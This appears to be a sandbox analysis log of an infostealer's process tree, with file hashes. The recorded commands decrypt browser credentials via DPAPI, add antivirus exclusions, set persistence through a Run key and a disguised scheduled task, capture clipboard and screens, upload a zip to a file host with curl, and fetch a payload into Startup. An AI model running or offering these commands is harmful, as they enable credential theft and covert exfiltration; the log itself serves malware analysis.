C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES83F6.tmp" "c:\Users\Admin\AppData\Local\Temp\5kpjkbri\CSCE400AA8EC443E2A29B455AFBC1AEB.TMP"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "curl http://api.ipify.org/ --ssl-no-revoke"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "tasklist"

C:\Windows\system32\curl.exe

curl http://api.ipify.org/ --ssl-no-revoke

C:\Windows\system32\tasklist.exe

tasklist

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "tasklist"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "powershell.exe Add-Type -AssemblyName System.Security; [System.Security.Cryptography.ProtectedData]::Unprotect([byte[]]@(1,0,0,0,208,140,157,223,1,21,209,17,140,122,0,192,79,194,151,235,1,0,0,0,238,156,48,203,153,40,183,74,155,57,209,91,118,45,98,188,0,0,0,0,2,0,0,0,0,0,16,102,0,0,0,1,0,0,32,0,0,0,240,132,237,149,45,67,26,224,155,156,8,181,224,96,78,151,154,46,202,101,249,97,141,165,239,101,32,47,174,213,144,44,0,0,0,0,14,128,0,0,0,2,0,0,32,0,0,0,5,118,4,252,204,118,149,111,47,84,90,247,149,190,34,249,18,252,47,179,62,225,47,93,195,23,120,101,61,101,30,235,48,0,0,0,144,60,90,153,163,30,104,172,123,39,168,11,95,160,138,71,243,107,144,2,50,45,70,124,4,172,47,165,61,165,64,105,236,53,38,158,175,136,209,149,37,63,179,220,166,88,37,85,64,0,0,0,118,167,221,170,254,48,117,31,150,36,196,116,199,187,171,38,184,48,64,53,110,62,94,141,234,254,235,232,6,73,237,45,142,243,225,206,25,5,10,78,242,193,201,184,107,245,34,156,238,170,149,227,218,151,82,101,219,166,72,147,198,231,15,120), $null, 'CurrentUser')"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell.exe Add-Type -AssemblyName System.Security; [System.Security.Cryptography.ProtectedData]::Unprotect([byte[]]@(1,0,0,0,208,140,157,223,1,21,209,17,140,122,0,192,79,194,151,235,1,0,0,0,238,156,48,203,153,40,183,74,155,57,209,91,118,45,98,188,0,0,0,0,2,0,0,0,0,0,16,102,0,0,0,1,0,0,32,0,0,0,240,132,237,149,45,67,26,224,155,156,8,181,224,96,78,151,154,46,202,101,249,97,141,165,239,101,32,47,174,213,144,44,0,0,0,0,14,128,0,0,0,2,0,0,32,0,0,0,5,118,4,252,204,118,149,111,47,84,90,247,149,190,34,249,18,252,47,179,62,225,47,93,195,23,120,101,61,101,30,235,48,0,0,0,144,60,90,153,163,30,104,172,123,39,168,11,95,160,138,71,243,107,144,2,50,45,70,124,4,172,47,165,61,165,64,105,236,53,38,158,175,136,209,149,37,63,179,220,166,88,37,85,64,0,0,0,118,167,221,170,254,48,117,31,150,36,196,116,199,187,171,38,184,48,64,53,110,62,94,141,234,254,235,232,6,73,237,45,142,243,225,206,25,5,10,78,242,193,201,184,107,245,34,156,238,170,149,227,218,151,82,101,219,166,72,147,198,231,15,120), $null, 'CurrentUser')

C:\Windows\system32\tasklist.exe

tasklist

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "powershell.exe Add-Type -AssemblyName System.Security; [System.Security.Cryptography.ProtectedData]::Unprotect([byte[]]@(1,0,0,0,208,140,157,223,1,21,209,17,140,122,0,192,79,194,151,235,1,0,0,0,238,156,48,203,153,40,183,74,155,57,209,91,118,45,98,188,16,0,0,0,10,0,0,0,69,0,100,0,103,0,101,0,0,0,16,102,0,0,0,1,0,0,32,0,0,0,30,33,9,7,82,225,214,92,15,159,202,147,139,45,89,87,231,151,227,53,170,79,92,11,223,143,97,106,97,154,161,9,0,0,0,0,14,128,0,0,0,2,0,0,32,0,0,0,21,253,137,58,142,103,70,102,12,189,67,174,111,249,213,75,220,211,167,169,116,14,13,182,98,95,162,252,2,230,176,103,48,0,0,0,52,214,32,138,26,48,216,25,50,239,33,228,149,1,46,204,28,5,199,198,129,96,1,203,31,101,98,78,63,94,55,14,217,3,117,232,82,31,234,98,233,98,205,228,177,255,26,93,64,0,0,0,130,107,36,32,57,149,185,197,48,184,95,52,114,206,152,10,184,207,1,53,59,142,23,125,248,153,95,41,99,30,222,95,238,92,97,132,248,36,245,34,7,59,219,119,201,126,196,81,133,18,22,202,225,208,186,249,141,11,195,129,16,159,30,250), $null, 'CurrentUser')"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell.exe Add-Type -AssemblyName System.Security; [System.Security.Cryptography.ProtectedData]::Unprotect([byte[]]@(1,0,0,0,208,140,157,223,1,21,209,17,140,122,0,192,79,194,151,235,1,0,0,0,238,156,48,203,153,40,183,74,155,57,209,91,118,45,98,188,16,0,0,0,10,0,0,0,69,0,100,0,103,0,101,0,0,0,16,102,0,0,0,1,0,0,32,0,0,0,30,33,9,7,82,225,214,92,15,159,202,147,139,45,89,87,231,151,227,53,170,79,92,11,223,143,97,106,97,154,161,9,0,0,0,0,14,128,0,0,0,2,0,0,32,0,0,0,21,253,137,58,142,103,70,102,12,189,67,174,111,249,213,75,220,211,167,169,116,14,13,182,98,95,162,252,2,230,176,103,48,0,0,0,52,214,32,138,26,48,216,25,50,239,33,228,149,1,46,204,28,5,199,198,129,96,1,203,31,101,98,78,63,94,55,14,217,3,117,232,82,31,234,98,233,98,205,228,177,255,26,93,64,0,0,0,130,107,36,32,57,149,185,197,48,184,95,52,114,206,152,10,184,207,1,53,59,142,23,125,248,153,95,41,99,30,222,95,238,92,97,132,248,36,245,34,7,59,219,119,201,126,196,81,133,18,22,202,225,208,186,249,141,11,195,129,16,159,30,250), $null, 'CurrentUser')

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "wmic diskdrive get serialnumber"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "reg delete "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v Steam /f"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "schtasks /create /tn "GoogleUpdateTaskMachineUAC" /tr "cscript //nologo C:\ProgramData\edge\Updater\RunBatHidden.vbs" /sc minute /mo 10 /f /RU SYSTEM"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "powershell.exe -WindowStyle Hidden -ExecutionPolicy Bypass -File "C:\ProgramData\edge\Updater\Get-Clipboard.ps1""

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "wmic bios get smbiosbiosversion"

C:\Windows\System32\Wbem\WMIC.exe

wmic diskdrive get serialnumber

C:\Windows\system32\reg.exe

reg delete "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v Steam /f

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell.exe -WindowStyle Hidden -ExecutionPolicy Bypass -File "C:\ProgramData\edge\Updater\Get-Clipboard.ps1"

C:\Windows\System32\Wbem\WMIC.exe

wmic bios get smbiosbiosversion

C:\Windows\system32\schtasks.exe

schtasks /create /tn "GoogleUpdateTaskMachineUAC" /tr "cscript //nologo C:\ProgramData\edge\Updater\RunBatHidden.vbs" /sc minute /mo 10 /f /RU SYSTEM

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "sc config "Steam Client Service" start=disabled"

C:\Windows\system32\sc.exe

sc config "Steam Client Service" start=disabled

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "cscript //nologo "C:\ProgramData\edge\Updater\RunBatHidden.vbs""

C:\Windows\system32\cscript.exe

cscript //nologo "C:\ProgramData\edge\Updater\RunBatHidden.vbs"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "wmic baseboard get serialnumber"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "wmic MemoryChip get /format:list | find /i "Speed""

C:\Windows\System32\Wbem\WMIC.exe

wmic MemoryChip get /format:list

C:\Windows\System32\Wbem\WMIC.exe

wmic baseboard get serialnumber

C:\Windows\system32\find.exe

find /i "Speed"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c ""C:\ProgramData\edge\Updater\CheckEpicGamesLauncher.bat" "

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "wmic path win32_computersystemproduct get uuid"

C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe

"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\f5jwmi4n\f5jwmi4n.cmdline"

C:\Windows\System32\Wbem\WMIC.exe

wmic path win32_computersystemproduct get uuid

C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe

C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES8A11.tmp" "c:\Users\Admin\AppData\Local\Temp\f5jwmi4n\CSC1556E0DAFDB493FA0E7B8B181B8B64.TMP"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "wmic path win32_VideoController get name"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup"

C:\Windows\System32\Wbem\WMIC.exe

wmic path win32_VideoController get name

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "wmic PATH Win32_VideoController GET Description,PNPDeviceID"

C:\Windows\System32\Wbem\WMIC.exe

wmic PATH Win32_VideoController GET Description,PNPDeviceID

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "powershell Get-ItemPropertyValue -Path 'HKLM:SOFTWARE\Microsoft\Windows NT\CurrentVersion' -Name ProductName"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell Get-ItemPropertyValue -Path 'HKLM:SOFTWARE\Microsoft\Windows NT\CurrentVersion' -Name ProductName

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "wmic memorychip get serialnumber"

C:\Windows\System32\Wbem\WMIC.exe

wmic memorychip get serialnumber

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "curl http://api.ipify.org/ --ssl-no-revoke"

C:\Windows\system32\curl.exe

curl http://api.ipify.org/ --ssl-no-revoke

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "wmic csproduct get uuid"

C:\Windows\System32\Wbem\WMIC.exe

wmic csproduct get uuid

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Roaming\Microsoft\Windows"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "wmic cpu get processorid"

C:\Windows\System32\Wbem\WMIC.exe

wmic cpu get processorid

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "wmic bios get smbiosbiosversion"

C:\Windows\System32\Wbem\WMIC.exe

wmic bios get smbiosbiosversion

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "getmac /NH"

C:\Windows\system32\getmac.exe

getmac /NH

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "wmic MemoryChip get /format:list | find /i "Speed""

C:\Windows\System32\Wbem\WMIC.exe

wmic MemoryChip get /format:list

C:\Windows\system32\find.exe

find /i "Speed"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "wmic path win32_VideoController get name"

C:\Windows\System32\Wbem\WMIC.exe

wmic path win32_VideoController get name

C:\Windows\system32\reg.exe

reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Run /v "Steam" /t REG_SZ /d "C:\Users\Admin\AppData\Local\Temp\Executor\xylex.exe" /f

C:\Windows\system32\reg.exe

reg query HKCU\Software\Microsoft\Windows\CurrentVersion\Run /v "Steam"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "powershell Get-ItemPropertyValue -Path 'HKLM:SOFTWARE\Microsoft\Windows NT\CurrentVersion' -Name ProductName"

C:\Windows\system32\curl.exe

curl -o "C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Steam_Service.exe" YOUR-BINDED-EXE-LINK-HERE

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell Get-ItemPropertyValue -Path 'HKLM:SOFTWARE\Microsoft\Windows NT\CurrentVersion' -Name ProductName

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "curl http://api.ipify.org/ --ssl-no-revoke"

C:\Windows\system32\curl.exe

curl http://api.ipify.org/ --ssl-no-revoke

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "wmic bios get smbiosbiosversion"

C:\Windows\System32\Wbem\WMIC.exe

wmic bios get smbiosbiosversion

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "wmic MemoryChip get /format:list | find /i "Speed""

C:\Windows\System32\Wbem\WMIC.exe

wmic MemoryChip get /format:list

C:\Windows\system32\find.exe

find /i "Speed"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "wmic path win32_VideoController get name"

C:\Windows\System32\Wbem\WMIC.exe

wmic path win32_VideoController get name

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "powershell Get-ItemPropertyValue -Path 'HKLM:SOFTWARE\Microsoft\Windows NT\CurrentVersion' -Name ProductName"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell Get-ItemPropertyValue -Path 'HKLM:SOFTWARE\Microsoft\Windows NT\CurrentVersion' -Name ProductName

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "curl http://api.ipify.org/ --ssl-no-revoke"

C:\Windows\system32\curl.exe

curl http://api.ipify.org/ --ssl-no-revoke

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "wmic bios get smbiosbiosversion"

C:\Windows\System32\Wbem\WMIC.exe

wmic bios get smbiosbiosversion

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "wmic MemoryChip get /format:list | find /i "Speed""

C:\Windows\System32\Wbem\WMIC.exe

wmic MemoryChip get /format:list

C:\Windows\system32\find.exe

find /i "Speed"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "powershell -ExecutionPolicy Bypass -File "C:\Users\Admin\AppData\Local\Temp\CaptureScreens.ps1""

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "wmic path win32_VideoController get name"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "curl --location --request POST "https://api.filedoge.com/upload" -H "Content-Type: multipart/form-data;" --form "file=@C:/ProgramData/Steam/Launcher/EN-Pogmxnrt.zip";"

C:\Windows\System32\Wbem\WMIC.exe

wmic path win32_VideoController get name

C:\Windows\system32\curl.exe

curl --location --request POST "https://api.filedoge.com/upload" -H "Content-Type: multipart/form-data;" --form "file=@C:/ProgramData/Steam/Launcher/EN-Pogmxnrt.zip";

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -ExecutionPolicy Bypass -File "C:\Users\Admin\AppData\Local\Temp\CaptureScreens.ps1"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "powershell Get-ItemPropertyValue -Path 'HKLM:SOFTWARE\Microsoft\Windows NT\CurrentVersion' -Name ProductName"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell Get-ItemPropertyValue -Path 'HKLM:SOFTWARE\Microsoft\Windows NT\CurrentVersion' -Name ProductName

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "curl http://api.ipify.org/ --ssl-no-revoke"

C:\Windows\system32\curl.exe

curl http://api.ipify.org/ --ssl-no-revoke

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "wmic bios get smbiosbiosversion"

C:\Windows\System32\Wbem\WMIC.exe

wmic bios get smbiosbiosversion

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "wmic MemoryChip get /format:list | find /i "Speed""

C:\Windows\System32\Wbem\WMIC.exe

wmic MemoryChip get /format:list

C:\Windows\system32\find.exe

find /i "Speed"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "wmic path win32_VideoController get name"

C:\Windows\System32\Wbem\WMIC.exe

wmic path win32_VideoController get name

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "powershell Get-ItemPropertyValue -Path 'HKLM:SOFTWARE\Microsoft\Windows NT\CurrentVersion' -Name ProductName"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell Get-ItemPropertyValue -Path 'HKLM:SOFTWARE\Microsoft\Windows NT\CurrentVersion' -Name ProductName

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "curl http://api.ipify.org/ --ssl-no-revoke"

C:\Windows\system32\curl.exe

curl http://api.ipify.org/ --ssl-no-revoke

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "wmic bios get smbiosbiosversion"

C:\Windows\System32\Wbem\WMIC.exe

wmic bios get smbiosbiosversion

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "wmic MemoryChip get /format:list | find /i "Speed""

C:\Windows\System32\Wbem\WMIC.exe

wmic MemoryChip get /format:list

C:\Windows\system32\find.exe

find /i "Speed"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "wmic path win32_VideoController get name"

C:\Windows\System32\Wbem\WMIC.exe

wmic path win32_VideoController get name

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "powershell Get-ItemPropertyValue -Path 'HKLM:SOFTWARE\Microsoft\Windows NT\CurrentVersion' -Name ProductName"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell Get-ItemPropertyValue -Path 'HKLM:SOFTWARE\Microsoft\Windows NT\CurrentVersion' -Name ProductName

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "curl http://api.ipify.org/ --ssl-no-revoke"

C:\Windows\system32\curl.exe

curl http://api.ipify.org/ --ssl-no-revoke

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "wmic bios get smbiosbiosversion"

C:\Windows\System32\Wbem\WMIC.exe

wmic bios get smbiosbiosversion

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "wmic MemoryChip get /format:list | find /i "Speed""

C:\Windows\System32\Wbem\WMIC.exe

wmic MemoryChip get /format:list

C:\Windows\system32\find.exe

find /i "Speed"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "wmic path win32_VideoController get name"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "rmdir /s /q "C:/ProgramData/Steam/Launcher""

C:\Windows\System32\Wbem\WMIC.exe

wmic path win32_VideoController get name

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "powershell Get-ItemPropertyValue -Path 'HKLM:SOFTWARE\Microsoft\Windows NT\CurrentVersion' -Name ProductName"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell Get-ItemPropertyValue -Path 'HKLM:SOFTWARE\Microsoft\Windows NT\CurrentVersion' -Name ProductName

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "curl http://api.ipify.org/ --ssl-no-revoke"

C:\Windows\system32\curl.exe

curl http://api.ipify.org/ --ssl-no-revoke

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "wmic bios get smbiosbiosversion"

C:\Windows\System32\Wbem\WMIC.exe

wmic bios get smbiosbiosversion

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "wmic MemoryChip get /format:list | find /i "Speed""

C:\Windows\System32\Wbem\WMIC.exe

wmic MemoryChip get /format:list

C:\Windows\system32\find.exe

find /i "Speed"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "wmic path win32_VideoController get name"

C:\Windows\System32\Wbem\WMIC.exe

wmic path win32_VideoController get name

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "powershell Get-ItemPropertyValue -Path 'HKLM:SOFTWARE\Microsoft\Windows NT\CurrentVersion' -Name ProductName"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell Get-ItemPropertyValue -Path 'HKLM:SOFTWARE\Microsoft\Windows NT\CurrentVersion' -Name ProductName

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "curl http://api.ipify.org/ --ssl-no-revoke"

C:\Windows\system32\curl.exe

curl http://api.ipify.org/ --ssl-no-revoke

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "wmic bios get smbiosbiosversion"

C:\Windows\System32\Wbem\WMIC.exe

wmic bios get smbiosbiosversion

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "wmic MemoryChip get /format:list | find /i "Speed""

C:\Windows\System32\Wbem\WMIC.exe

wmic MemoryChip get /format:list

C:\Windows\system32\find.exe

find /i "Speed"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "wmic path win32_VideoController get name"

C:\Windows\System32\Wbem\WMIC.exe

wmic path win32_VideoController get name

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "powershell Get-ItemPropertyValue -Path 'HKLM:SOFTWARE\Microsoft\Windows NT\CurrentVersion' -Name ProductName"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell Get-ItemPropertyValue -Path 'HKLM:SOFTWARE\Microsoft\Windows NT\CurrentVersion' -Name ProductName

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "curl http://api.ipify.org/ --ssl-no-revoke"

C:\Windows\system32\curl.exe

curl http://api.ipify.org/ --ssl-no-revoke

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "wmic bios get smbiosbiosversion"

C:\Windows\System32\Wbem\WMIC.exe

wmic bios get smbiosbiosversion

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "wmic MemoryChip get /format:list | find /i "Speed""

C:\Windows\System32\Wbem\WMIC.exe

wmic MemoryChip get /format:list

C:\Windows\system32\find.exe

find /i "Speed"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "wmic path win32_VideoController get name"

C:\Windows\System32\Wbem\WMIC.exe

wmic path win32_VideoController get name

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "powershell Get-ItemPropertyValue -Path 'HKLM:SOFTWARE\Microsoft\Windows NT\CurrentVersion' -Name ProductName"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell Get-ItemPropertyValue -Path 'HKLM:SOFTWARE\Microsoft\Windows NT\CurrentVersion' -Name ProductName

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "curl http://api.ipify.org/ --ssl-no-revoke"

C:\Windows\system32\curl.exe

curl http://api.ipify.org/ --ssl-no-revoke

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "wmic bios get smbiosbiosversion"

C:\Windows\System32\Wbem\WMIC.exe

wmic bios get smbiosbiosversion

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "wmic MemoryChip get /format:list | find /i "Speed""

C:\Windows\System32\Wbem\WMIC.exe

wmic MemoryChip get /format:list

C:\Windows\system32\find.exe

find /i "Speed"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "wmic path win32_VideoController get name"

C:\Windows\System32\Wbem\WMIC.exe

wmic path win32_VideoController get name

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "powershell Get-ItemPropertyValue -Path 'HKLM:SOFTWARE\Microsoft\Windows NT\CurrentVersion' -Name ProductName"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell Get-ItemPropertyValue -Path 'HKLM:SOFTWARE\Microsoft\Windows NT\CurrentVersion' -Name ProductName

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "curl http://api.ipify.org/ --ssl-no-revoke"

C:\Windows\system32\curl.exe

curl http://api.ipify.org/ --ssl-no-revoke

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "wmic bios get smbiosbiosversion"

C:\Windows\System32\Wbem\WMIC.exe

wmic bios get smbiosbiosversion

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "wmic MemoryChip get /format:list | find /i "Speed""

C:\Windows\System32\Wbem\WMIC.exe

wmic MemoryChip get /format:list

C:\Windows\system32\find.exe

find /i "Speed"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "wmic path win32_VideoController get name"

C:\Windows\System32\Wbem\WMIC.exe

wmic path win32_VideoController get name

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "powershell Get-ItemPropertyValue -Path 'HKLM:SOFTWARE\Microsoft\Windows NT\CurrentVersion' -Name ProductName"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell Get-ItemPropertyValue -Path 'HKLM:SOFTWARE\Microsoft\Windows NT\CurrentVersion' -Name ProductName

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "curl http://api.ipify.org/ --ssl-no-revoke"

C:\Windows\system32\curl.exe

curl http://api.ipify.org/ --ssl-no-revoke

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "wmic bios get smbiosbiosversion"

C:\Windows\System32\Wbem\WMIC.exe

wmic bios get smbiosbiosversion

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "wmic MemoryChip get /format:list | find /i "Speed""

C:\Windows\System32\Wbem\WMIC.exe

wmic MemoryChip get /format:list

C:\Windows\system32\find.exe

find /i "Speed"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "wmic path win32_VideoController get name"

C:\Windows\System32\Wbem\WMIC.exe

wmic path win32_VideoController get name

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "powershell Get-ItemPropertyValue -Path 'HKLM:SOFTWARE\Microsoft\Windows NT\CurrentVersion' -Name ProductName"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell Get-ItemPropertyValue -Path 'HKLM:SOFTWARE\Microsoft\Windows NT\CurrentVersion' -Name ProductName

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "curl http://api.ipify.org/ --ssl-no-revoke"

C:\Windows\system32\curl.exe

curl http://api.ipify.org/ --ssl-no-revoke

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "wmic bios get smbiosbiosversion"

C:\Windows\System32\Wbem\WMIC.exe

wmic bios get smbiosbiosversion

C:\Program Files\Mozilla Firefox\firefox.exe

"C:\Program Files\Mozilla Firefox\firefox.exe"

C:\Program Files\Mozilla Firefox\firefox.exe

"C:\Program Files\Mozilla Firefox\firefox.exe"

C:\Program Files\Mozilla Firefox\firefox.exe

"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="1704.0.27215710\1063592625" -parentBuildID 20230214051806 -prefsHandle 1784 -prefMapHandle 1524 -prefsLen 22035 -prefMapSize 235121 -appDir "C:\Program Files\Mozilla Firefox\browser" - {b0f4faf4-c264-47bd-a90e-2797bec149ab} 1704 "\\.\pipe\gecko-crash-server-pipe.1704" 1864 2185e010b58 gpu

C:\Program Files\Mozilla Firefox\firefox.exe

"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="1704.1.563846262\1015350981" -parentBuildID 20230214051806 -prefsHandle 2376 -prefMapHandle 2372 -prefsLen 22071 -prefMapSize 235121 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {dce366c9-7079-4437-ba10-bb03c3f54416} 1704 "\\.\pipe\gecko-crash-server-pipe.1704" 2388 2185128ab58 socket


Network


Files

C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_wk2mh1yy.lmd.ps1

C:\Users\Admin\AppData\Local\Temp\Executor\xylex.exe

C:\Users\Admin\AppData\Local\Temp\pkg\f806f89dc41dde00ca7124dc1e649bdc9b08ff2eff5c891b764f3e5aefa9548c\sqlite3\build\Release\node_sqlite3.node

C:\Users\Admin\AppData\Local\Temp\Executor\temp.ps1

C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log

\??\c:\Users\Admin\AppData\Local\Temp\sctyk5ct\sctyk5ct.0.cs

MD5 7bc8de6ac8041186ed68c07205656943
SHA1 673f31957ab1b6ad3dc769e86aedc7ed4b4e0a75
SHA256 36865e3bca9857e07b1137ada07318b9caaef9608256a6a6a7fd426ee03e1697
SHA512 0495839c79597e81d447672f8e85b03d0401f81c7b2011a830874c33812c54dab25b0f89a202bbb71abb4ffc7cb2c07cc37c008b132d4d5d796aebdd12741dba

\??\c:\Users\Admin\AppData\Local\Temp\sctyk5ct\sctyk5ct.cmdline

